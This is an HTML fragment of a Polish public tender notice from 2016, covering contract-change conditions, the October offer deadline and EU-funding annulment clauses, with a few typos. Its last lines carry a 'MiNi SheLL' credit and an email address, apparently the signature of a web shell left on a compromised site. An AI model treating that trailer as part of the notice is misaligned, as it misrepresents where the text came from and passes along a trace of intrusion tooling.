d)	w przypadku konieczności zapewnienia koordynacji dostawy przedmiotu umowy oraz inh6ych umów zawartych przez Zmawiającego  dopuszczalna jest zmiana umowy w zakresie zmiany miejsca przeprowadzenia miejsca odbioru przedmiotu umowy, miejsca szkolenia przedstawicieli Zamawiającego,
e)	w przypadku zmiany przepisów prawa  dopuszczalne jest tak zmiana umowa, która umożliwi dostosowanie postanowień niniejszej umowy lub przedmiotów umowy i jego wyposażenia do nowych przepisów prawa,
f)	w przypadku wprowadzenia zmian umowy niedopuszczalna jest zmiana umowy, której konsekwencja będzie zwiększenie ceny przedmiotu umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/10/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com